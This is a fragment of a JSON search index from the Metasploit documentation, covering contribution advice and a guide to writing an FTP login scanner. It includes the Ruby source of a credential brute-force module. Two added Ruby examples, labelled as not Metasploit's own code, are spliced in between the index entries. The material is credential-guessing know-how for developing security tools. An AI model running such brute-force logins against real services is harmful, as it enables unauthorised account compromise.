    "content": "The Metasploit development mailing list used to be hosted on SourceForge, but is now on Google Groups. Metasploit Hackers is dead, long live Metasploit Hackers. (Or mailto:Metasploit Hackers). The old list is archived on seclists.org. ",
    "url": "/docs/contact.html#mailing-list",
    "relUrl": "/docs/contact.html#mailing-list"
  },"52": {
    "doc": "Contact",
    "title": "Abuse",
    "content": "Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to [email protected] which goes to all the current committers. If the incident involves a committer, you may report directly to [email protected] or [email protected]. ",
    "url": "/docs/contact.html#abuse",
    "relUrl": "/docs/contact.html#abuse"
  },"53": {
    "doc": "Contact",
    "title": "Contact",
    "content": " ",
    "url": "/docs/contact.html",
    "relUrl": "/docs/contact.html"
  },"54": {
    "doc": "Contributing to Metasploit",
    "title": "Like hacking things? Start here.",
    "content": "Every so often, we’ll get a request along the lines of, “Hey, I’m new to Metasploit, and I want to help!” The usual answer is something like, “Great! Here’s our framework bug tracker, get crackin!” . However, tackling core Metasploit Framework bugs or particularly squirrelly exploits probably isn’t the right place for the new contributor. Believe me, everyone was a newbie once, there’s no shame in that. Those bugs and vulns are usually complicated, and there are so many to choose from that it’s hard to get started. Here are some ideas to get you started. Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do’s and Don’ts in CONTRIBUTING.md. Read up on those. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#like-hacking-things-start-here",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#like-hacking-things-start-here"
  },"55": {
    "doc": "Contributing to Metasploit",
    "title": "Making Your First PR",
    "content": "Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at Creating Your First PR . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#making-your-first-pr",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#making-your-first-pr"
  },"56": {
    "doc": "Contributing to Metasploit",
    "title": "Server exploits",
    "content": "Server exploits are always in demand; why bother with a complicated social engineering campaign when you can go straight to the pain point of a vulnerable network? Here are some search queries to get you started: . | Remote exploits from Exploit-DB | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#server-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#server-exploits"
  },"57": {
    "doc": "Contributing to Metasploit",
    "title": "Client Exploits",
    "content": "Client exploits generally run as an “evil service” that a remote client will connect to. They nearly always require some kind of user interaction to trigger, such as viewing a web page, downloading a file, or otherwise connecting to the service controlled by the attacker. | Browser Vulns from SecurityFocus via Google search terms | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#client-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#client-exploits"
  },"58": {
    "doc": "Contributing to Metasploit",
    "title": "Local and Privilege Escalation Exploits",
    "content": "Privilege escalation exploits tend to require that the attacker already has an account on the target computer. They are nearly always implemented as Metasploit exploit modules under one of the local trees (platform dependent), but sometimes they are better off as post modules. This is especially true for privilege escalation bugs. | Local Vulns from Exploit-DB | . ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#local-and-privilege-escalation-exploits",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#local-and-privilege-escalation-exploits"
  },"59": {
    "doc": "Contributing to Metasploit",
    "title": "Unstable modules",
    "content": "Want to pick up where someone else left off? Super! Just check the guide on rescuing Unstable Modules and push these poor, unloved modules over the finish line with decent testing and code cleanup. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#unstable-modules",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#unstable-modules"
  },"60": {
    "doc": "Contributing to Metasploit",
    "title": "Framework bugs and features",
    "content": "If exploit dev isn’t your thing, but more straightforward Ruby development is, then here are some good places to get started: . | Recent Bugs, which tend to be either very easy or very hard to fix (not a lot of middle ground). | Feature requests, which are often in the same boat. | . Along these same lines is a perennial need for better automated testing, down in the spec directory. If you have a talent for exploring strange and wonderful code bases, pick out a chunk of the Metasploit core code and define what you expect its working behavior to be. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#framework-bugs-and-features",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#framework-bugs-and-features"
  },"61": {
    "doc": "Contributing to Metasploit",
    "title": "Non-code",
    "content": "We can always use better documentation. Those guys over at Offensive Security do a great job with Metasploit Unleashed, but as with all complex bodies of work, there are surely bugs to be found. If you have ideas on how to make the documentation on Metasploit clear and more accessible to more people, go nuts. Write wiki articles in your fork (hint, Gollum is excellent for this) and let someone know about them, we’ll be happy to reflect them here and maintain your credit. If you’re interested in working with us on documentation long-term, that’s even better; reach out on Slack for info on how best to make changes. Ditto with YouTube screencasts of particular common tasks. Narration while you do it is great. People seem to love YouTube videos of this stuff – there are over 40,000 of the things out there, and we’d love for someone to step up and curate a top 10 or top 100 of those that we can promote here for new and experienced users. For developer types: we are slowly but surely converting all of Metasploit to use standardized commenting using YARD, so we could always use more accurate and more comprehensive YARD documentation for pretty much anything found in lib. We will happily take pull requests that contain nothing but comment docs! . Again, there’s always room on #metasploit on Freenode. Be helpful with the questions there, and people are more likely to help you in the future. Same goes for the Metasploit Slack team, where all sorts of new and proficient users and devs are looking for help and camaraderie. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#non-code",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#non-code"
  },"62": {
    "doc": "Contributing to Metasploit",
    "title": "The Usual Warnings",
    "content": "You probably shouldn’t run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn’t use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior. Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you’re not familiar with them. If you get stuck, try to explain your specific problem as best you can on our Freenode IRC channel, #metasploit (joining requires a registered nick). Someone should be able to lend a hand. Apparently, some of those people never sleep. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#the-usual-warnings",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#the-usual-warnings"
  },"63": {
    "doc": "Contributing to Metasploit",
    "title": "Thank you",
    "content": "In case nobody’s said it yet: Thanks for your interest and support! Exploit developers from the open source community are the soul of Metasploit, and by contributing your time and talent, you are helping advance the state of the art for intelligent IT defense. We simply couldn’t do all of this without you. ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html#thank-you",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html#thank-you"
  },"64": {
    "doc": "Contributing to Metasploit",
    "title": "Contributing to Metasploit",
    "content": " ",
    "url": "/docs/development/get-started/contributing-to-metasploit.html",
    "relUrl": "/docs/development/get-started/contributing-to-metasploit.html"
  },"65": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Credential Objects",
    "content": "Metasploit::Framework::Credential (lib/metasploit/framework/credential.rb) . These objects represent the most basic concept of how we now think about Credentials. | Public: The public part of a credential refers to the part that can be publicly known. In almost all cases this is the username. | Private: The private part of the credential, this is the part that should be a secret. This currently represents: Password, SSH Key, NTLM Hash etc. | Private Type: This defines what type of private credential is defined above | Realm: This represents an authentication realm that the credential is valid for. This is a tertiary part of the authentication process. Examples include: Active Directory Domain, Postgres Database etc. | Realm Key: This defines what type of Realm the Realm Attribute represents. | Paired: This attribute is a boolean value that sets whether the Credential must have both a public and private to be valid. | . All LoginScanners use Credential objects as the basis for their attempts. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credential-objects",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credential-objects"
  },"66": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Result Objects",
    "content": "Metasploit::Framework::LoginScanner::Result (lib/metasploit/framework/login_scanner/result.rb) . These are the objects yielded by the scan! method on each LoginScanner. They contain: . | Access Level: An optional Access Level which can describe the level of access granted by the login attempt. | Credential: The Credential object that achieved that result | Proof: An optional proof string to show why we think the result is valid | Status: The status of the login attempt. These values come from Metasploit::Model::Login::Status; examples include “Incorrect”, “Unable to Connect”, “Untried” etc | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#result-objects",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#result-objects"
  },"67": {
    "doc": "Writing an FTP LoginScanner",
    "title": "CredentialCollection",
    "content": "Metasploit::Framework::CredentialCollection (lib/metasploit/framework/credential_collection.rb) . This class is created by the build_credential_collection method provided by the Msf::Auxiliary::AuthBrute mixin. It takes a bunch of options that, when specified, take priority over the corresponding datastore options. Typical uses only need to specify the username: and password: options since those can be different from one module to another (e.g. ‘USERNAME’, ‘SMBUser’, ‘HttpUsername’, etc.). It can be passed in as the cred_details on the LoginScanner, and responds to #each and yields crafted Credentials. The build_credential_collection method will handle prepending usernames and passwords as well as skipping entries as configured by the DB_SKIP_EXISTING option. Example (from modules/auxiliary/scanner/ftp/ftp_login.rb): . cred_collection = build_credential_collection( username: datastore['USERNAME'], password: datastore['PASSWORD'], prepended_creds: anonymous_creds ) . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credentialcollection",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#credentialcollection"
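As an added illustration (this is not Metasploit's own code), the following Ruby stand-in reproduces the credential-generation behaviour a login module relies on from CredentialCollection: prepended credentials first, then USERPASS_FILE pairs, then every username crossed with every password, with user-as-pass and blank-password entries and no duplicate pairs. MiniCredentialCollection, the Credential struct and the wordlists written to temp files are all constructed for this example; the real class may order things differently.

```ruby
# Added example, not Metasploit's code: a stand-in for the parts of
# CredentialCollection#each that a login module relies on, so the yield order
# can be inspected offline. The ordering is this example's own choice; the real
# one is in lib/metasploit/framework/credential_collection.rb.
require 'set'
require 'tempfile'

Credential = Struct.new(:public, :private, keyword_init: true)

class MiniCredentialCollection
  def initialize(username: nil, password: nil, user_file: nil, pass_file: nil,
                 userpass_file: nil, user_as_pass: false, blank_passwords: false,
                 prepended_creds: [])
    @username, @password = username, password
    @user_file, @pass_file, @userpass_file = user_file, pass_file, userpass_file
    @user_as_pass, @blank_passwords = user_as_pass, blank_passwords
    @prepended_creds = prepended_creds
  end

  # Yields each Credential to try: prepended ones first (ftp_login uses this
  # for anonymous logins), then USERPASS_FILE pairs, then every user crossed
  # with every password. A (public, private) pair is never yielded twice.
  def each(&blk)
    seen = Set.new
    emit = lambda do |cred|
      key = [cred.public, cred.private]
      blk.call(cred) unless seen.include?(key)
      seen << key
    end

    @prepended_creds.each { |c| emit.call(c) }

    # USERPASS_FILE lines are "user password" pairs tried exactly as given.
    read_lines(@userpass_file).each do |line|
      user, pass = line.split(/\s+/, 2)
      emit.call(Credential.new(public: user, private: pass.to_s))
    end

    publics  = [@username].compact + read_lines(@user_file)
    privates = [@password].compact + read_lines(@pass_file)
    publics.each do |user|
      emit.call(Credential.new(public: user, private: user)) if @user_as_pass
      emit.call(Credential.new(public: user, private: ''))   if @blank_passwords
      privates.each { |pass| emit.call(Credential.new(public: user, private: pass)) }
    end
  end

  private

  # Wordlists are read line by line; a nil path means the option is unset.
  def read_lines(path)
    return [] if path.nil?
    File.readlines(path, chomp: true).reject(&:empty?)
  end
end

# Constructed wordlists and options, mirroring what ftp_login reads from the
# datastore; returns the [public, private] pairs in the order they are yielded.
def demo_collection
  users  = Tempfile.new('users');  users.write("admin\nftp\n");      users.flush
  passes = Tempfile.new('passes'); passes.write("password\nftp\n"); passes.flush
  anon = [Credential.new(public: 'anonymous', private: 'IEUser@')]
  coll = MiniCredentialCollection.new(username: 'ftp', user_file: users.path,
                                      pass_file: passes.path, user_as_pass: true,
                                      blank_passwords: true, prepended_creds: anon)
  pairs = []
  coll.each { |c| pairs << [c.public, c.private] }
  pairs
ensure
  users&.close!
  passes&.close!
end
```

With USERNAME set to ftp and a USER_FILE that also contains ftp, demo_collection yields eight pairs: the anonymous credential, then ftp with itself, a blank password and password, then the four admin combinations; the repeated ftp user and the ftp/ftp pair from PASS_FILE are deduplicated rather than tried twice.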
  },"68": {
    "doc": "Writing an FTP LoginScanner",
    "title": "LoginScanner Base",
    "content": "Metasploit::Framework::LoginScanner::Base (lib/metasploit/framework/login_scanner/base.rb) . This is a Ruby Module that contains all the base behaviour for all LoginScanners. All LoginScanner classes should include this module. The specs for this behaviour are kept in a shared example group. Specs for your LoginScanner should use the following syntax to include these tests: . it_behaves_like 'Metasploit::Framework::LoginScanner::Base', has_realm_key: false, has_default_realm: false . Where has_realm_key and has_default_realm should be set according to whether your LoginScanner has those things. (More on this later) . LoginScanners always take a collection of Credentials to try and one host and port. So each LoginScanner object attempts to login to only one specific service. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#loginscanner-base",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#loginscanner-base"
  },"69": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Attributes",
    "content": ". | connection_timeout: The number of seconds to wait before a connection attempt times out | cred_details: An object that yields credentials on each (like a CredentialCollection or an Array) | host: The address for the target host | port: The port number for the target service | proxies: Any proxies to use in the connection (some scanners might not support this) | stop_on_success: Whether to stop trying after a successful login is found | . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#attributes",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#attributes"
  },"70": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Methods",
    "content": "each_credential . You will not have to worry much about this method, but be aware that it is there. It iterates through whatever is in cred_details, does some normalization and tries to make sure each Credential is properly set up for use by the given LoginScanner. It yields each Credential in a block. def each_credential cred_details.each do |raw_cred| # This could be a Credential object, or a Credential Core, or an Attempt object # so make sure that whatever it is, we end up with a Credential. credential = raw_cred.to_credential if credential.realm.present? && self.class::REALM_KEY.present? credential.realm_key = self.class::REALM_KEY yield credential elsif credential.realm.blank? && self.class::REALM_KEY.present? && self.class::DEFAULT_REALM.present? credential.realm_key = self.class::REALM_KEY credential.realm = self.class::DEFAULT_REALM yield credential elsif credential.realm.present? && self.class::REALM_KEY.blank? second_cred = credential.dup # Strip the realm off here, as we don't want it credential.realm = nil credential.realm_key = nil yield credential # Some services can take a domain in the username like this even though # they do not explicitly take a domain as part of the protocol. second_cred.public = \"#{second_cred.realm}\\\\#{second_cred.public}\" second_cred.realm = nil second_cred.realm_key = nil yield second_cred else yield credential end end end . set_sane_defaults . This method will be overridden by each specific LoginScanner. It is called at the end of the initializer and sets any sane defaults for attributes that have them and were not given a specific value in the initializer. # This is a placeholder method. Each LoginScanner class # will override this with any sane defaults specific to # its own behaviour. # @abstract # @return [void] def set_sane_defaults self.connection_timeout = 30 if self.connection_timeout.nil? end . attempt_login . 
This method is just a stub on the Base mixin. It will be overridden in each LoginScanner class to contain the logic to take one single Credential object and use it to make a login attempt against the target service. It returns a ::Metasploit::Framework::LoginScanner::Result object containing all the information about that attempt’s result. For an example let’s look at the attempt_login method from Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb). Note the rescue list: connection-level failures are reported as UNABLE_TO_CONNECT rather than INCORRECT, so a dropped connection is not recorded as a wrong password, and scan! (below) can count it towards its bail-out threshold. . # (see Base#attempt_login) def attempt_login(credential) result_options = { credential: credential } begin success = connect_login(credential.public, credential.private) rescue ::EOFError, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionProxyError, Rex::ConnectionTimeout, Rex::TimeoutError, Errno::ECONNRESET, Errno::EINTR, ::Timeout::Error result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT success = false end if success result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL elsif !(result_options.has_key? :status) result_options[:status] = Metasploit::Model::Login::Status::INCORRECT end ::Metasploit::Framework::LoginScanner::Result.new(result_options) end . scan! . This method is the main one you will be concerned with. It does several things: . | It calls valid!, which checks all of the validations on the class and raises a Metasploit::Framework::LoginScanner::Invalid if any of the validations fail. This exception contains all the error messages for any failing validations. | It keeps track of the connection error count, and bails out if there are too many connection errors (ten in total) or too many in a row (three), as the code shows. | It runs through all of the credentials by calling each_credential with a block. | In that block it passes each credential to #attempt_login. | It yields the Result object into the block it is passed. | Successes are tracked per username, so no further passwords are tried for a user that has already been cracked; if stop_on_success is set it also exits early as soon as a result is a success. | . 
# Attempt to login with every {Credential credential} in # {#cred_details}, by calling {#attempt_login} once for each. # # If a successful login is found for a user, no more attempts # will be made for that user. # # @yieldparam result [Result] The {Result} object for each attempt # @yieldreturn [void] # @return [void] def scan! valid! # Keep track of connection errors. # If we encounter too many, we will stop. consecutive_error_count = 0 total_error_count = 0 successful_users = Set.new each_credential do |credential| next if successful_users.include?(credential.public) result = attempt_login(credential) result.freeze yield result if block_given? if result.success? consecutive_error_count = 0 break if stop_on_success successful_users << credential.public else if result.status == Metasploit::Model::Login::Status::UNABLE_TO_CONNECT consecutive_error_count += 1 total_error_count += 1 break if consecutive_error_count >= 3 break if total_error_count >= 10 end end end nil end . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#methods",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#methods"
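To watch each_credential's realm handling and scan!'s bail-out rules run end to end, here is an added, self-contained Ruby stand-in; it is not Metasploit's code. Credential, Result, MiniScanner and FakeFtpService are this example's own simplifications of the classes described above, the status symbols stand in for the Metasploit::Model::Login::Status constants, and the credential list and fake service are constructed.

```ruby
# Added example, not Metasploit's code: a stand-in for Base#each_credential
# and Base#scan! run against a fake FTP service, so the realm handling and the
# bail-out rules can be watched offline. Credential, Result, MiniScanner and
# FakeFtpService are this example's own simplifications of the real classes.
require 'set'

Credential = Struct.new(:public, :private, :realm, :realm_key, keyword_init: true) do
  def to_credential; self; end
  def to_s; "#{public}:#{private}"; end
end

# Status symbols stand in for the Metasploit::Model::Login::Status constants.
Result = Struct.new(:credential, :status, :proof, keyword_init: true) do
  def success?; status == :successful; end
end

# Constructed target: one valid login; every connection after the first
# max_conns attempts is dropped, as a rate-limiting daemon might do.
class FakeFtpService
  def initialize(valid:, max_conns:)
    @valid, @max_conns, @attempts = valid, max_conns, 0
  end
  def login(user, pass)
    @attempts += 1
    raise Errno::ECONNRESET if @attempts > @max_conns
    @valid == [user, pass]
  end
end

class MiniScanner
  REALM_KEY = nil # as in LoginScanner::FTP: the protocol has no realm
  def initialize(service:, cred_details:, stop_on_success: false)
    @service, @cred_details, @stop_on_success = service, cred_details, stop_on_success
  end

  # The "realm present, REALM_KEY blank" branch of Base#each_credential:
  # such a credential is tried bare and then again as REALM\public.
  def each_credential
    @cred_details.each do |raw|
      cred = raw.to_credential
      if cred.realm && self.class::REALM_KEY.nil?
        second = cred.dup
        cred.realm = cred.realm_key = nil
        yield cred
        second.public = "#{second.realm}\\#{second.public}"
        second.realm = second.realm_key = nil
        yield second
      else
        yield cred
      end
    end
  end

  # As in LoginScanner::FTP#attempt_login, a connection failure is reported
  # as :unable_to_connect, not :incorrect; scan! below counts those.
  def attempt_login(cred)
    ok = @service.login(cred.public, cred.private)
    Result.new(credential: cred, status: ok ? :successful : :incorrect)
  rescue Errno::ECONNRESET, Errno::ECONNREFUSED, Errno::ETIMEDOUT => e
    Result.new(credential: cred, status: :unable_to_connect, proof: e.class.name)
  end

  # Base#scan!: skip users already cracked, give up after 3 consecutive or
  # 10 total connection errors, and optionally stop at the first success.
  def scan!
    consecutive = total = 0
    successful_users = Set.new
    each_credential do |cred|
      next if successful_users.include?(cred.public)
      result = attempt_login(cred).freeze
      yield result if block_given?
      if result.success?
        consecutive = 0
        break if @stop_on_success
        successful_users << cred.public
      elsif result.status == :unable_to_connect
        consecutive += 1
        total += 1
        break if consecutive >= 3 || total >= 10
      end
    end
    nil
  end
end

# Scans a constructed credential list; returns [credential, status] pairs
# in the order scan! yielded them.
def run_demo(stop_on_success: false, max_conns: 100)
  creds = [
    Credential.new(public: 'anonymous', private: 'IEUser@'),
    Credential.new(public: 'bob', private: 'wrong'),
    Credential.new(public: 'bob', private: 'hunter2'),
    Credential.new(public: 'bob', private: 'other'),              # skipped once bob is cracked
    Credential.new(public: 'alice', private: 'pw', realm: 'CORP') # tried bare, then as CORP\alice
  ]
  service = FakeFtpService.new(valid: %w[bob hunter2], max_conns: max_conns)
  log = []
  MiniScanner.new(service: service, cred_details: creds, stop_on_success: stop_on_success)
             .scan! { |r| log << [r.credential.to_s, r.status] }
  log
end
```

run_demo returns five results by default (bob's third password is skipped once bob is cracked, and alice is tried both bare and as CORP\alice); run_demo(stop_on_success: true) stops after the first success, and run_demo(max_conns: 1) shows the scanner giving up after three consecutive connection errors instead of logging them as wrong passwords.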
  },"71": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Constants",
    "content": "Although not defined on Base, each LoginScanner has a series of Constants that can be defined on it to assist with critical behaviour. | DEFAULT_PORT: DEFAULT_PORT is a simple constant for use with set_sane_defaults. If the port isn’t set by the user it will use DEFAULT_PORT. This is put in a constant so it can be quickly referenced from outside the scanner. | . These next two Constants are used by the LoginScanner namespace method classes_for_service. This method, invoked as Metasploit::Framework::LoginScanner.classes_for_service(<Mdm::Service>), will return an array of LoginScanner classes that may be useful to try against that particular Service. | LIKELY_PORTS : This constant holds an array of port numbers that it would likely be useful to use this scanner against. | LIKELY_SERVICE_NAMES : Like above, except with strings for service names instead of port numbers. | PRIVATE_TYPES : This contains an array of symbols representing the different Private credential types it supports. It should always match the underscored, demodulized name of the Private class, i.e. :password, :ntlm_hash, :ssh_key | . These constants are for LoginScanners that have to deal with Realms such as AD domains or Database Names. | REALM_KEY: The type of Realm this scanner expects to deal with. Should always be one of the constants from Metasploit::Model::Realm::Key (as example2 below shows), or nil if the protocol has no notion of a realm. | DEFAULT_REALM: Some scanners have a default realm (like WORKSTATION for AD domain stuff). If a credential is given to a scanner that requires a realm, but the credential has no realm, this value will be added to the credential as the realm. | CAN_GET_SESSION: this should be either true or false as to whether we expect we could somehow get a session with a Credential found from this scanner. | . example1 ( Metasploit::Framework::LoginScanner::FTP) . DEFAULT_PORT = 21 LIKELY_PORTS = [ DEFAULT_PORT, 2121 ] LIKELY_SERVICE_NAMES = [ 'ftp' ] PRIVATE_TYPES = [ :password ] REALM_KEY = nil . 
example2 ( Metasploit::Framework::LoginScanner::SMB) . CAN_GET_SESSION = true DEFAULT_REALM = 'WORKSTATION' LIKELY_PORTS = [ 139, 445 ] LIKELY_SERVICE_NAMES = [ \"smb\" ] PRIVATE_TYPES = [ :password, :ntlm_hash ] REALM_KEY = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#constants",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#constants"
  },"72": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Pulling it all Together in a module",
    "content": "So now you hopefully have a good idea of all the moving pieces involved in creating a LoginScanner. The next step is using your brand new LoginScanner in an actual module. Let’s look at the ftp_login module: . def run_host(ip) . Every Bruteforce/Login module should be a scanner and should use the run_host method which will run once for each RHOST. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#pulling-it-all-together-in-a-module",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#pulling-it-all-together-in-a-module"
  },"73": {
    "doc": "Writing an FTP LoginScanner",
    "title": "The Cred Collection",
    "content": "cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], prepended_creds: anonymous_creds ) . So here we see the CredentialCollection getting created using the datastore options. We pass in the options for Cred creation such as wordlists, raw usernames and passwords, whether to try the username as a password, and whether to try blank passwords. You’ll also notice an option here called prepended_creds. FTP is one of the only modules to make use of this, but it is generally available through the CredentialCollection. This option is an array of Metasploit::Framework::Credential objects that the collection yields before any others. FTP uses this to test for anonymous FTP access. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-cred-collection",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-cred-collection"
  },"74": {
    "doc": "Writing an FTP LoginScanner",
    "title": "Initialising the Scanner",
    "content": "scanner = Metasploit::Framework::LoginScanner::FTP.new( host: ip, port: rport, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: datastore['STOP_ON_SUCCESS'], connection_timeout: 30 ) . Here we actually create our Scanner object. We set the IP and port based on data the module already knows about. We can pull any user-supplied proxy data from the datastore. We also pull from the datastore whether to stop on a success for this service. The cred_details attribute is populated by our CredentialCollection, which handles all the credential generation for us invisibly. This gives us our scanner object, all configured and ready to go. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#initialising-the-scanner",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#initialising-the-scanner"
  },"75": {
    "doc": "Writing an FTP LoginScanner",
    "title": "The Scan Block",
    "content": "scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good \"#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}\" else invalidate_login(credential_data) print_status \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\" end end . This is the real heart of the matter. We call scan! on our scanner and pass it a block. As we mentioned before, the scanner yields each attempt’s Result object into that block. We check the result’s status to see if it was successful or not. The Result object now has a .to_h method which returns a hash compatible with our credential creation methods. We take that hash and merge in our module-specific information and workspace id. In the case of a success we build some info hashes and call create_credential. This is a method found in the metasploit-credential gem under lib/metasploit/credential/creation.rb in a mixin called Metasploit::Credential::Creation. This mixin is included in the Report mixin, so if your module includes that mixin you’ll get these methods for free. create_credential creates a Metasploit::Credential::Core. We then take that core, the service data, and merge it with some additional data. This additional data includes the access level, the current time (to update last_attempted_at on the Metasploit::Credential::Login), and the status. Finally, for a success, we output the result to the console. In the case of a failure, we call the invalidate_login method. This method also comes from the Creation mixin. It looks to see if a Login object already exists for this credential:service pair. If it does, it updates the status to the status we got back from the scanner. 
This is primarily to account for Login objects created by things like Post modules that have an untried status. ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-scan-block",
    "relUrl": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#the-scan-block"
  },"76": {
    "doc": "Writing an FTP LoginScanner",
    "title": "ftp_login Final View",
    "content": "Pulling it all together, we get a new ftp_login module that looks something like this: . ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/ftp' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute def proto 'ftp' end def initialize super( 'Name' => 'FTP Authentication Scanner', 'Description' => %q{ This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. }, 'Author' => 'todb', 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), OptBool.new('RECORD_GUEST', [ false, \"Record anonymous/guest logins to the database\", false]) ], self.class) register_advanced_options( [ OptBool.new('SINGLE_SESSION', [ false, 'Disconnect after every login attempt', false]) ] ) deregister_options('FTPUSER','FTPPASS') # Can use these, but should use 'username' and 'password' @accepts_all_logins = {} end def run_host(ip) print_status(\"#{ip}:#{rport} - Starting FTP login sweep\") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], pass_file: datastore['PASS_FILE'], password: datastore['PASSWORD'], user_file: datastore['USER_FILE'], userpass_file: datastore['USERPASS_FILE'], username: datastore['USERNAME'], user_as_pass: datastore['USER_AS_PASS'], prepended_creds: anonymous_creds ) scanner = Metasploit::Framework::LoginScanner::FTP.new( host: ip, port: rport, proxies: datastore['PROXIES'], cred_details: cred_collection, stop_on_success: 
 datastore['STOP_ON_SUCCESS'], connection_timeout: 30 ) scanner.scan! do |result| credential_data = result.to_h credential_data.merge!( module_fullname: self.fullname, workspace_id: myworkspace_id ) if result.success? credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) print_good \"#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}\" else invalidate_login(credential_data) print_status \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\" end end end # Always check for anonymous access by pretending to be a browser. def anonymous_creds anon_creds = [ ] if datastore['RECORD_GUEST'] ['IEUser@', 'User@', '[email protected]', '[email protected]' ].each do |password| anon_creds << Metasploit::Framework::Credential.new(public: 'anonymous', private: password) end end anon_creds end def test_ftp_access(user,scanner) dir = Rex::Text.rand_text_alpha(8) write_check = scanner.send_cmd(['MKD', dir], true) if write_check and write_check =~ /^2/ scanner.send_cmd(['RMD',dir], true) print_status(\"#{rhost}:#{rport} - User '#{user}' has READ/WRITE access\") return 'Read/Write' else print_status(\"#{rhost}:#{rport} - User '#{user}' has READ access\") return 'Read-only' end end end . ",
    "url": "/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html#ftp_login-final-view",
